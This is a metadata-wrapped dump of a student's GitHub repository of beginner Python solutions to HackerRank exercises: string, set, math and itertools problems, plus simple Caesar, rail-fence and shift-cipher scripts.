"05647f9f615e58b113caad91360dd81c642ed599", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1272, "license_type": "no_license", "max_line_length": 135, "num_lines": 39, "path": "/find_string.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "def count_substring(string, sub_string):\n\n return(sum([1 for i in range(len(string) - len(sub_string) + 1) # we move through the string here and check if we are able\n if string[i:i + len(sub_string)] == sub_string])) # to find the substring in the string and generate 1 for each time\n # it is true and then we add all the 1's in the list\nif __name__ == '__main__':\n string = input().strip()\n sub_string = input().strip()\n\n count = count_substring(string, sub_string)\n print(count)\n\n\n#METHOD 2:\n# def count_substring(string, sub_string):\n# count=0\n# #print(len(string),len(sub_string))\n# for i in range(0, len(string)-len(sub_string)+1):\n# if string[i] == sub_string[0]:\n# flag=1\n# for j in range (0, len(sub_string)):\n# if string[i+j] != sub_string[j]:\n# flag=0\n# break\n# if flag==1:\n# count += 1\n# return count\n\n\n\n#METHOD 3:\n # count = 0\n # i = 0\n # while i < len(string):\n # if string.find(sub_string, i) >= 0:\n # i = string.find(sub_string, i) + 1\n # count += 1\n # else:\n # break\n" }, { "alpha_fraction": 0.44075828790664673, "alphanum_fraction": 0.4881516695022583, "avg_line_length": 22.55555534362793, "blob_id": "08e0d716ffd00192ff774d78473bd8b5728e69e9", "content_id": "835c0d374fa13fe2ef55d9d2a2059da9385b0276", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 211, "license_type": "no_license", "max_line_length": 36, "num_lines": 9, "path": "/door_mat_design.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "s = input().split()\nN = int(s[0])\nM = int(s[1])\nc = '.|.'\nfor i in range(N//2):\n print((c*(2*i+1)).center(M,'-'))\nprint('WELCOME'.center(M,'-'))\nfor i in range(N//2,0,-1):\n print((c*(2*i-1)).center(M,'-'))" }, { "alpha_fraction": 0.49833887815475464, "alphanum_fraction": 0.5448504686355591, "avg_line_length": 20.571428298950195, "blob_id": "e5825ea2597ddf88e788ddc97a1f204d580b68f6", "content_id": "0b1bc5f25b62a9c7a5f7de9fb6df8c5a2b02b69d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 301, "license_type": "no_license", "max_line_length": 45, "num_lines": 14, "path": "/captain_room.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "K = int(input())\nlist1 = list(map(int,input().split()))\n\n# for i in list1:\n# if list1.count(i) != K:\n# print(i)\n\nset1 = set(list1)\n# print(set1)\n# print(sum(set1)*K)\n# # ans = ((sum(set1)*K) - sum(list1)) // K-1\n# # print(ans)\n# print(sum(list1))\nprint((sum(set1)*K - sum(list1)) // (K-1))" }, { "alpha_fraction": 0.53125, "alphanum_fraction": 0.6656249761581421, "avg_line_length": 25.75, "blob_id": "e599fd836ffb7dff85bc4d9d7dd768928b0ffced", "content_id": "60b3318c4a8d818f01a3cd4a995a624e95f23fff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 320, "license_type": "no_license", "max_line_length": 75, "num_lines": 12, "path": "/math_triangle_quest_2.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# problem is to print palindromic string in format\n# 1\n# 121\n# 12321\n# 1234321\n# 123454321\n# for n = 5\n# in this we can detect a pattern that each line is square of 1, 11, 111...\n# that is it is square of increasing numbers of 1\n# also input limit is 0-10\nfor x in range(1,int(input())+1):\n print(((10**x - 1)//9)**2)" }, { "alpha_fraction": 0.6741213798522949, "alphanum_fraction": 0.6741213798522949, "avg_line_length": 33.88888931274414, "blob_id": "1e671596c1b4cee27c1df0918b850545afb08c2f", "content_id": "7c2e471c69623bfe46b121a800afaf45ae65a547", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 313, "license_type": "no_license", "max_line_length": 79, "num_lines": 9, "path": "/date_and_time_calender.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "import calendar\ndays = ['MONDAY','TUESDAY','WEDNESDAY','THURSDAY','FRIDAY','SATURDAY','SUNDAY']\nmonth, day, year = map(int, input().split())\n\nprint(days[(calendar.weekday(year,month,day))])\n\n# ONE LINE ANSWER\n# m, d, y = map(int, input().split())\n#print(list(calendar.day_name)[calendar.weekday(y, m, d)].upper())" }, { "alpha_fraction": 0.5091678500175476, "alphanum_fraction": 0.5162200331687927, "avg_line_length": 24.35714340209961, "blob_id": "b16581d2fc65fcd5beb8897b7af9a6144d42ddfa", "content_id": "8640b9eef80bf49ff652aa752b07dd1ccc298553", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 709, "license_type": "no_license", "max_line_length": 77, "num_lines": 28, "path": "/merge_the_tools.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "def merge_the_tools(string, k):\n\n for part in zip(*[iter(string)] * k):\n print(part)\n d = dict()\n print(''.join([ d.setdefault(c, c) for c in part if c not in d ]))\n\nif __name__ == '__main__':\n string, k = input(), int(input())\n merge_the_tools(string, k)\n\n#Method 2:\n# s=raw_input()\n# k=int(raw_input())\n# n=len(s)\n#\n# for x in xrange(0, n, k):\n# slicedStr = s[x : x+k]\n# uni =[]\n# for y in slicedStr:\n# if y not in uni:\n# uni.append(y)\n# print ''.join(uni)\n\n# Method 3:\n# ts = [string[ind:ind+k] for ind, s in enumerate(string) if ind % k == 0]\n# for s in ts:\n# print(\"\".join([x for ind, x in enumerate(s) if x not in s[0:ind]]))" }, { "alpha_fraction": 0.610362708568573, "alphanum_fraction": 0.6362694501876831, "avg_line_length": 18.693878173828125, "blob_id": "d65090d00468e76e0d3a6a512af998a2c7881f30", "content_id": "7df0dddfca0a4e1285273c94e07720e3d363d31b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 965, "license_type": "no_license", "max_line_length": 51, "num_lines": 49, "path": "/monosubstituition_cipher.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "def encrypt():\n pass\ndef decrypt():\n pass\n\nAlphabet = 'abcdefghijklmnopqrstuvwxyz'\nlist1 = list(Alphabet)\n#print(list1)\n\nshift_key = input(\"Enter the ciphertext alphabet:\")\n#print(shift_key)\n\n#checking if the key is monoaplphabetic\nif len(shift_key)>1:\n print(\"Error: Key to be only single letter.\")\n\nlist2 = []\nlist2.append(shift_key.lower())\n#print(list2)\n\na = list1.index(shift_key.lower())\n\nfor i in list1[a+1:]:\n list2.append(i.lower())\nfor i in list1[:a]:\n list2.append(i.lower())\n\n#print(list2)\nlist3 = []\nlist4 = []\n\nplain_text = input(\"Enter the Message:\").split()\n\nfor i in plain_text:\n for j in i:\n #print(j)\n x = list1.index(j.lower())\n #print(x)\n list3.append(list2[x])\n#print(list3)\n\nfor i in list3:\n x = list2.index(i.lower())\n list4.append(list1[x])\n\ne_msg = ''.join(map(str, list3))\nd_msg = ''.join(map(str, list4))\nprint(f\"Encrypted message is: {e_msg}\")\nprint(f\"Decrypted message is: {d_msg}\")\n" }, { "alpha_fraction": 0.7071823477745056, "alphanum_fraction": 0.7127071619033813, "avg_line_length": 35.29999923706055, "blob_id": "81981642d0adbd526de538c1d7a6d83ee4e53e05", "content_id": "1b80f6cae1fab38c92a3172dce3eb7f7f948f416", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 363, "license_type": "no_license", "max_line_length": 73, "num_lines": 10, "path": "/math_find_angle_abc.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# got new thing to learn\nimport math\na = int(input())\nb= int(input())\n\n# atan2() intakes two arguments instead of one for atan()\n# The gimmick is, the line that bisects the hypoteneuse will end up going\n# through the other corner of the rectangle with sides a and b.\n# So we're just figuring atan(a,b)\nprint(str(int(round(math.degrees(math.atan2(a,b))))) + '°')" }, { "alpha_fraction": 0.5555555820465088, "alphanum_fraction": 0.5634920597076416, "avg_line_length": 15.866666793823242, "blob_id": "a7f1a94c384d5ac2f70aa79d9f5dd420bde090c4", "content_id": "706c70763459afdeda6299d5fa874f6f89e4e885", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 252, "license_type": "no_license", "max_line_length": 37, "num_lines": 15, "path": "/ordered_dict.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# from collections import OrderedDict\n# from collections import Counter\n#\n# n = int(input())\n# d = OrderedDict()\n# l = []\n#\n# for i in range(n):\n# a,b = input().split()\n# l.append(a)\n# d[a] = int(b)\n# d1 = Counter()\n#\n# print(d)\n# print(d1)" }, { "alpha_fraction": 0.5954825282096863, "alphanum_fraction": 0.5995893478393555, "avg_line_length": 24, "blob_id": "8e60fc169d19c58ff661d571c1c1f15d51975a94", "content_id": "00ccf7b24cd7771cdb6aa19b81f72ee72f651201", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 974, "license_type": "no_license", "max_line_length": 74, "num_lines": 39, "path": "/cns_railfence_cipher.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "def main():\n # get the number of layers to rail encrypt\n layers = int(input(\"Enter the key: \"))\n\n # get the plain text\n plain_text = input(\"Enter the plain text: \")\n\n # encrypt the plain text\n cipher_text = encrypt(layers, plain_text)\n print(\"Encrypted text: \" + cipher_text)\n\n\ndef encrypt(layers, plain_text):\n # remove all white spaces in text\n plain_text = plain_text.replace(\" \", \"\")\n\n # change plain text to upper case\n plain_text = plain_text.upper()\n\n # divide plain text into layers number of strings\n rail = [\"\"] * layers\n #print(rail) # to check if proper number of layers/rows are formed\n\n layer = 0\n for character in plain_text:\n rail[layer] += character\n #print(rail[layer]) # just to check if things are working properly\n\n if layer >= layers - 1:\n layer = 0\n else:\n layer += 1\n\n cipher = \"\".join(rail)\n return cipher\n\n\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.5398229956626892, "alphanum_fraction": 0.5575221180915833, "avg_line_length": 21.600000381469727, "blob_id": "f83be6d7a7a2abe12c4a3cecf689f0080e675c9a", "content_id": "c1bed99c57b667aa64b60ca129002a71e2b8ae81", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 339, "license_type": "no_license", "max_line_length": 38, "num_lines": 15, "path": "/set_check_subset.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# taking number of test cases\nN = int(input())\nlist1 = []\n# taking input for sets\nfor i in range(N):\n N2 = int(input())\n A = set(map(int, input().split()))\n N3 = int(input())\n B = set(map(int, input().split()))\n\n if A.issubset(B):\n list1.append('True')\n else:\n list1.append(\"False\")\nprint('\\n'.join(list1))\n" }, { "alpha_fraction": 0.5675675868988037, "alphanum_fraction": 0.5705705881118774, "avg_line_length": 29.272727966308594, "blob_id": "5f706b15192c6ecccdb7ae49f050c2f4a56776b9", "content_id": "e4346328e12a22d2ed8d0b8972e380083081d9ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 333, "license_type": "no_license", "max_line_length": 74, "num_lines": 11, "path": "/string_validators.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "s = input()\nfor i in('isalnum()', 'isalpha()', 'isdigit()', 'islower()', 'isupper()'):\n print(any( eval('c.' + i) for c in s))\n\n\n#METHOD 2:\n# print (any(i.isalnum() for i in s))\n# print (any(i.isalpha() for i in s))\n# print (any(i.isdigit() for i in s))\n# print (any(i.islower() for i in s))\n# print (any(i.isupper() for i in s))\n" }, { "alpha_fraction": 0.47547170519828796, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 16.733333587646484, "blob_id": "b1c4dd0b5ae0398ab565e61231eeff42c2cb75b6", "content_id": "8d6a2b485c48053eb54ad65c0d72c4c1b1b1130c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 265, "license_type": "no_license", "max_line_length": 63, "num_lines": 15, "path": "/math_triangle_quest.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# this ques asks to print this pattern\n#1\n# 22\n# 333\n# 4444\n# 55555\n# ......\n# when N is given we will print upto N-1\n# for example when N = 5 then we print upto N-1 i.e pattern is:\n# 1\n# 22\n# 333\n# 4444\nfor i in range(1,int(input())):\n print(((10**i)-1)//9 * i)" }, { "alpha_fraction": 0.5164835453033447, "alphanum_fraction": 0.5164835453033447, "avg_line_length": 17.399999618530273, "blob_id": "72a180c6c492fd6de97396ea2d10b6b302cdebe4", "content_id": "bd4d7c5ccd5933de8c0b5289e72df614a016fcc7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 91, "license_type": "no_license", "max_line_length": 32, "num_lines": 5, "path": "/math_integers_comes_in_all_sizes.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "a,b = int(input()), int(input())\nc,d = int(input()), int(input())\n\nx = a**b + c**d\nprint(x)" }, { "alpha_fraction": 0.443219393491745, "alphanum_fraction": 0.4696802794933319, "avg_line_length": 20.595237731933594, "blob_id": "779739b821e88a13bd9316fff89fceb1d1dfae11", "content_id": "fe13697b35204277d61ceef9fb3c3379aea326af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 907, "license_type": "no_license", "max_line_length": 59, "num_lines": 42, "path": "/ceaser_cipher.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "\ndef encrypt(text, key):\n result = \"\"\n\n for i in range(len(text)):\n char = text[i]\n\n if (char == ' '):\n result += ' '\n\n elif (char.isupper()):\n result += chr((ord(char) + key - 65) % 26 + 65)\n\n else:\n result += chr((ord(char) + key - 97) % 26 + 97)\n\n return result\n\ndef decrypt(result, key):\n d_res = \"\"\n\n for i in range(len(result)):\n char = result[i]\n\n if (char == ' '):\n d_res += ' '\n\n elif (char.isupper()):\n d_res += chr((ord(char) - key - 65) % 26 + 65)\n\n else:\n d_res += chr((ord(char) - key - 97) % 26 + 97)\n\n return d_res\n\np_text = input(\"Enter Plain text:\")\nkey = int(input(\"Enter the key:\"))\nprint('\\n')\nprint(\"Text : \" + p_text)\nprint(\"Shift : \" + str(key))\ne_res = encrypt(p_text, key)\nprint(\"Cipher: \" + e_res)\nprint(\"Decrypted: \" + decrypt(e_res,key))" }, { "alpha_fraction": 0.5829959511756897, "alphanum_fraction": 0.6255060434341431, "avg_line_length": 16.068965911865234, "blob_id": "436144475a63fd6dbb7feb187c55510f5e9110fc", "content_id": "f73b630305126123104b4e3b3a1bf3d7596cea9d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 494, "license_type": "no_license", "max_line_length": 64, "num_lines": 29, "path": "/set_operations.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# we have to perform remove , pop and discard operations on sets\n\n# taking input for elements of sets\nn = int(input())\ns = set(map(int, input().split()))\n\n# we will now take input for commands to be excuted\n\nN = int(input()) # number of commands to execute\n\nfor i in range(N):\n eval('s.{0}({1})'.format(*input().split()+['']))\nprint(sum(s))\n# print(''.join(s))\n\n#\n# 9\n# 1 2 3 4 5 6 7 8 9\n# 10\n# pop\n# remove 9\n# discard 9\n# discard 8\n# remove 7\n# pop\n# discard 6\n# remove 5\n# pop\n# discard 5" }, { "alpha_fraction": 0.6724137663841248, "alphanum_fraction": 0.6724137663841248, "avg_line_length": 25.454545974731445, "blob_id": "774b727a42ad72aa76a244cb1961f290a36fccaa", "content_id": "81dca17ad85e7fdb13bd18c729d38c6151fe0d86", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 290, "license_type": "no_license", "max_line_length": 63, "num_lines": 11, "path": "/itertools_permutations.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# we have to print permutations of given string of given length\nfrom itertools import permutations\n\na,b = input().split()\n# print(list(a))\n# print(b)\n# print(*permutations(list(a),int(b)), sep='\\n')\nx = sorted(list(permutations(list(a),int(b))))\n# print(x)\nfor i in x:\n print(\"\".join(i))" }, { "alpha_fraction": 0.7606837749481201, "alphanum_fraction": 0.7606837749481201, "avg_line_length": 57, "blob_id": "8c30b098564d79b752356952173b77790c6c6c41", "content_id": "3e6af7e5791790b8f9cf3c01df3f620abdc363f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 117, "license_type": "no_license", "max_line_length": 59, "num_lines": 2, "path": "/any_all.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "# task is to check if all the elements in list are positive\n# also whether or not if any one of them is palindromic\n\n" }, { "alpha_fraction": 0.6892655491828918, "alphanum_fraction": 0.6892655491828918, "avg_line_length": 24.428571701049805, "blob_id": "7f0ab4442dd619a369658bf4d40d59faa843f071", "content_id": "ea4e9381e090d7a9391f12004dd7b81cee7aa45c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 177, "license_type": "no_license", "max_line_length": 133, "num_lines": 7, "path": "/tuples.py", "repo_name": "shaan2348/hacker_rank", "src_encoding": "UTF-8", "text": "n = int(input())\n\nt = tuple(map(int,input().split())) # we are use map function here to convert the inputs from str to int because input() returns str\n\nprint(t)\n\nprint(hash(t))" } ]
52
koles161rus/invertedPendulum
https://github.com/koles161rus/invertedPendulum
e5195660e18863f768766b93c70623ecaae2bd72
214db0a5c447979b2337c9b2df8cbcb22f57bc2d
244de9995ab649a153aa6d8b9154616b1c430ecd
refs/heads/master
2020-03-30T18:25:25.152597
2018-10-04T00:40:44
2018-10-04T00:40:44
151,499,490
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.47035330533981323, "alphanum_fraction": 0.5102918744087219, "avg_line_length": 46.867645263671875, "blob_id": "a2c8d9da14a851f046fd87e8274ea0fbdd0278c8", "content_id": "bd0d8df32243ffc49a9ebd50b47aaf7e109ee146", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3255, "license_type": "no_license", "max_line_length": 83, "num_lines": 68, "path": "/inverted_pendulum (1)/inverted_pendulum/fuzzy/fuzzy_controller.py", "repo_name": "koles161rus/invertedPendulum", "src_encoding": "UTF-8", "text": "from .fuzzyinference import FuzzyControl\nfrom math import pi\n\n\ndef get_controller():\n ctrl = FuzzyControl()\n theta_division = 12\n theta_memberships = [\n ['trapezoid_left', -1.57 / theta_division, -0.58 / theta_division, 'vn'],\n ['triangle', -0.3927 / theta_division, 0.327 * 2.0 / theta_division, 'mn'],\n ['triangle', 0.0, 0.1745 * 2.0 / theta_division, 'z'],\n ['triangle', 0.3927 / theta_division, 0.327 * 2.0 / theta_division, 'mp'],\n ['trapezoid_right', 0.58 / theta_division, 1.57 / theta_division, 'vp']\n ]\n ctrl.add_input('theta', (-4*pi, 4 * pi), theta_memberships)\n\n dtheta_division = 12\n dtheta_memberships = [\n ['trapezoid_left', -1.57 / dtheta_division, -0.58 / dtheta_division, 'vn'],\n ['triangle', -0.3927 / dtheta_division, 2 * 0.327 / dtheta_division, 'mn'],\n ['triangle', 0.0, 2 * 0.1745 / dtheta_division, 'z'],\n ['triangle', 0.3927 / dtheta_division, 2 * 0.327 / dtheta_division, 'mp'],\n ['trapezoid_right', 0.58 / dtheta_division, 1.57 / dtheta_division, 'vp']\n ]\n ctrl.add_input('dtheta', (-1 * 200, 200), dtheta_memberships)\n\n force_memberships = [\n ['trapezoid_left', -0.99, -0.75, 'vn'],\n ['triangle', -0.6, 0.4, 'sn'],\n ['triangle', -0.3, 0.4, 'mn'],\n ['triangle', 0.0, 0.4, 'z'],\n ['triangle', 0.3, 0.4, 'mp'],\n ['triangle', 0.6, 0.4, 'sp'],\n ['trapezoid_right', 0.75, 0.99, 'vp']\n ]\n ctrl.add_output('force', (-1, 1), force_memberships)\n\n ctrl.add_rule({'theta': 'vn', 'dtheta': 'vn'}, {'force': 'vp'})\n ctrl.add_rule({'theta': 'vn', 'dtheta': 'mn'}, {'force': 'vp'})\n ctrl.add_rule({'theta': 'vn', 'dtheta': 'z'}, {'force': 'vp'})\n ctrl.add_rule({'theta': 'vn', 'dtheta': 'mp'}, {'force': 'vp'})\n ctrl.add_rule({'theta': 'vn', 'dtheta': 'vp'}, {'force': 'vp'})\n\n ctrl.add_rule({'theta': 'vp', 'dtheta': 'vn'}, {'force': 'vn'})\n ctrl.add_rule({'theta': 'vp', 'dtheta': 'mn'}, {'force': 'vn'})\n ctrl.add_rule({'theta': 'vp', 'dtheta': 'z'}, {'force': 'vn'})\n ctrl.add_rule({'theta': 'vp', 'dtheta': 'mp'}, {'force': 'vn'})\n ctrl.add_rule({'theta': 'vp', 'dtheta': 'vp'}, {'force': 'vn'})\n\n ctrl.add_rule({'theta': 'mn', 'dtheta': 'vn'}, {'force': 'vp'})\n ctrl.add_rule({'theta': 'mn', 'dtheta': 'mn'}, {'force': 'sp'})\n ctrl.add_rule({'theta': 'mn', 'dtheta': 'z'}, {'force': 'mp'})\n ctrl.add_rule({'theta': 'mn', 'dtheta': 'mp'}, {'force': 'mp'})\n ctrl.add_rule({'theta': 'mn', 'dtheta': 'vp'}, {'force': 'z'})\n\n ctrl.add_rule({'theta': 'z', 'dtheta': 'vn'}, {'force': 'sp'})\n ctrl.add_rule({'theta': 'z', 'dtheta': 'mn'}, {'force': 'mp'})\n ctrl.add_rule({'theta': 'z', 'dtheta': 'z'}, {'force': 'z'})\n ctrl.add_rule({'theta': 'z', 'dtheta': 'mp'}, {'force': 'mn'})\n ctrl.add_rule({'theta': 'z', 'dtheta': 'vp'}, {'force': 'sn'})\n\n ctrl.add_rule({'theta': 'mp', 'dtheta': 'vn'}, {'force': 'z'})\n ctrl.add_rule({'theta': 'mp', 'dtheta': 'mn'}, {'force': 'mn'})\n ctrl.add_rule({'theta': 'mp', 'dtheta': 'z'}, {'force': 'mn'})\n ctrl.add_rule({'theta': 'mp', 'dtheta': 'mp'}, {'force': 'sn'})\n ctrl.add_rule({'theta': 'mp', 'dtheta': 'vp'}, {'force': 'vn'})\n\n return ctrl\n" }, { "alpha_fraction": 0.3800186812877655, "alphanum_fraction": 0.4164332449436188, "avg_line_length": 24.5238094329834, "blob_id": "45d3b80af47279e62bba18a126cf97a8e112c57f", "content_id": "c8269f6e555523c3036db510684905c6494a078e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1071, "license_type": "no_license", "max_line_length": 89, "num_lines": 42, "path": "/inverted_pendulum (1)/inverted_pendulum/simulation/simulation.py", "repo_name": "koles161rus/invertedPendulum", "src_encoding": "UTF-8", "text": "from math import sin, cos, pi\nimport random\n\nclass Simulator:\n def simulate_step(self, state, F, dt):\n x, x_dot, theta, theta_dot = state\n\n m = 0.2\n M = 3\n L = 0.3\n K = 0.006\n A = x\n B = x_dot\n C = theta\n D = theta_dot\n g = 9.81\n b = 0.1\n\n A = L * sin(theta)\n B = L * cos(theta)\n\n C = (B**2 + K + B**2 * m + A**2 * m) * (M + m)\n D = F * B * m + B * m**2 * A * theta_dot**2 - b * x_dot * B * m - A * g * (M + m)\n\n theta_dot_dot = D / C\n x_dot_dot = ( (F + m * A * theta_dot**2 - b * x_dot) - D / C * B * m ) / (M + m)\n\n x_dot = state[1] + x_dot_dot * dt\n x = state[0] + x_dot * dt + x_dot_dot * dt * dt / 2\n\n theta_dot = state[3] + theta_dot_dot * dt\n theta = state[2] + theta_dot * dt + theta_dot_dot * dt * dt / 2\n\n return [ x, x_dot, theta, theta_dot ]\n\n def random_state(self, state):\n state[0] = 10\n state[1] = 0\n state[2] = pi - 60 * pi / 180\n state[3] = 0\n\n return state" }, { "alpha_fraction": 0.45028865337371826, "alphanum_fraction": 0.4855676591396332, "avg_line_length": 34.43939208984375, "blob_id": "3fe34d042ae3ef5607740c2e372eb1bcd686e98a", "content_id": "c4698aeaf5a9bd09fcb20d27972f48f911585dfa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4677, "license_type": "no_license", "max_line_length": 160, "num_lines": 132, "path": "/inverted_pendulum (1)/main.py", "repo_name": "koles161rus/invertedPendulum", "src_encoding": "UTF-8", "text": "from inverted_pendulum.qlearning.qlearning import QLearning\nfrom inverted_pendulum.fuzzy.fuzzy_controller import *\nfrom numpy import pi, cos, sin\nimport random\n\nimport matplotlib.pyplot as plt\n\nfrom inverted_pendulum.simulation.simulation import Simulator\nimport numpy as np\n\n\nclass InvertedPendulumBalancer:\n def __init__(self):\n self.dt = 0.01\n random.seed(200)\n self.max_force = 125\n self.step_n = int( 10 * 10**6 )\n self.last_n = 500 * 10**3\n self.simulator = Simulator()\n\n self.controller = QLearning( max_theta=2*pi, max_dtheta=30, max_x=60000, max_dx=40, n_x=10, n_dx=10, n_theta=6, n_dtheta=20, n_action=5, is_fuzzy=True )\n\n def plot_survival_times(self):\n survival_times = []\n for i in range(len(lines)):\n if i >= 1:\n survival_times.append(10*(lines[i][0] - lines[i - 1][0]))\n plt.plot(survival_times)\n plt.plot([last_n for s in survival_times])\n plt.show()\n\n def plot_states():\n plt.plot(thetas)\n for l in lines:\n plt.axvline(l[0], color=l[1], alpha=0.5)\n plt.plot(xs)\n plt.show()\n\n def run(self):\n state = [10, 0, pi, 0]\n t = 0\n plot_n = 7\n plot_resolution = 1\n\n states = []\n last_stable = 0\n survival_times = []\n survival_time = 0\n lines = []\n\n plt.rc_context({'axes.edgecolor':'orange', 'xtick.color':'red', 'ytick.color':'green', 'figure.facecolor':'white', 'axes.linewidth': 2})\n\n plt.ion()\n mng = plt.get_current_fig_manager()\n mng.resize(*mng.window.maxsize())\n\n theta_ax = plt.subplot2grid((4,3), (2,0), colspan=3)\n x_ax = plt.subplot2grid((4,3), (3,0), colspan=3)\n cart_ax = plt.subplot2grid((2,3), (0,0), colspan=3)\n\n for i in range(self.step_n):\n state[2] += (random.random() - 0.5) * 0.001\n survival_time += 1\n \n t = t + self.dt\n\n prev_state = state\n if i % plot_resolution == 0:\n survival_times.append(survival_time)\n states.append(state)\n\n if i % 1000 == 0:\n if len(states) > self.last_n / plot_resolution:\n xs = [s[0] for s in states]\n thetas = [s[2] for s in states]\n last_thetas = thetas[-int(self.last_n/plot_resolution):]\n last_xs = xs[-int(self.last_n/plot_resolution):]\n\n theta_std = np.std(last_thetas)\n x_std = np.std(last_xs)\n if theta_std < 0.1 and xs[-1] < 50 and (last_stable == 0 or i - last_stable > self.last_n):\n lines.append( (i / plot_resolution, 'b') )\n last_stable = i\n survival_time = 0\n state = self.simulator.random_state(state)\n\n theta = state[2]\n if theta <= pi / 2 or theta >= 3 * pi / 2:\n lines.append( (i / plot_resolution, 'r') )\n state = self.simulator.random_state(state)\n survival_time = 0\n \n q_state = [state[0], state[1], state[2] + pi, state[3]]\n\n action = self.controller.action(q_state)\n force = self.max_force * action[1]\n state = self.simulator.simulate_step(state, force, self.dt)\n\n next_q_state = [state[0], state[1], state[2] + pi, state[3]]\n\n reward = 5\n if abs(pi - state[2]) >= 0.1:\n reward = -30 * ( abs(pi - state[2]) ** 2 )\n \n if abs(state[0]) >= 15:\n reward -= abs(state[0]) ** 1.5\n\n self.controller.update(q_state, action[0], next_q_state, reward)\n\n if i > 0 and i % (plot_n - 1) == 0:\n x_ax.plot([s[0] for s in states], color='g')\n theta_ax.plot([s[2] for s in states], color='r')\n\n cart_ax.lines = []\n cart_width = 10\n cart_height = 0.5\n factor = 2\n r = 1\n\n cart_ax.axis([-factor * cart_width, factor * cart_width, 0, factor * cart_width])\n L = 6 * cart_height\n L_discount = (L + L * sin(pi/2 - state[2]) ** 2)\n cart_ax.plot([state[0], state[0] - L_discount * cos(pi/2 - state[2])], \n [1.5 * cart_height, 1.5 * cart_height - L_discount * sin(pi/2 - state[2])],\n color='b', \n solid_capstyle=\"round\",\n linewidth=2)\n\n plt.pause(0.000001)\n\n if i % 10 == 0:\n print(i)" }, { "alpha_fraction": 0.49990010261535645, "alphanum_fraction": 0.5190809369087219, "avg_line_length": 34.24647903442383, "blob_id": "1c8381e71fb4925209e065deb9cb0c18aa00d545", "content_id": "7452a410153a62c8c3457c29c42121140f09327c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5005, "license_type": "no_license", "max_line_length": 117, "num_lines": 142, "path": "/inverted_pendulum (1)/inverted_pendulum/qlearning/qlearning.py", "repo_name": "koles161rus/invertedPendulum", "src_encoding": "UTF-8", "text": "import random\nfrom math import pi\nimport numpy as np\nfrom ..fuzzy.fuzzy_controller import get_controller\n\n\nclass QLearning:\n def __init__(self, max_theta, max_dtheta, max_x, max_dx, n_theta, n_dtheta, n_x, n_dx, n_action, is_fuzzy=False):\n self.init_constants()\n\n self.max_theta = max_theta\n self.max_dtheta = max_dtheta\n self.max_x = max_x\n self.max_dx = max_dx\n self.n_action = n_action\n self.n_theta = n_theta\n self.n_dheta = n_dtheta\n self.n_x = n_x\n self.n_dx = n_dx\n self.n_action = n_action\n \n shape = ( n_x, n_dx, n_theta, n_dtheta, n_action )\n\n self.Q = self.initial_Q * np.ones(shape, dtype=float)\n if is_fuzzy:\n self.init_fuzzy()\n\n def init_constants(self):\n self.initial_Q = 0\n self.initial_fuzzy_Q = 2\n self.visits = {}\n\n def init_fuzzy(self):\n print(\"Generating fuzzy table\")\n ctrl = get_controller()\n\n for i in range( self.Q.shape[2] ):\n if i % 10 == 0:\n print(\"Generating row \", i, \" of \", self.Q.shape[0], \" rows for Q table\")\n for j in range(self.Q.shape[3]):\n _, _, theta, dtheta = self.denormalize_state( (0, 0, i, j) )\n print(\"\\t\", theta, dtheta)\n original_action = ctrl.output({'theta': theta, 'dtheta': dtheta})['force']\n 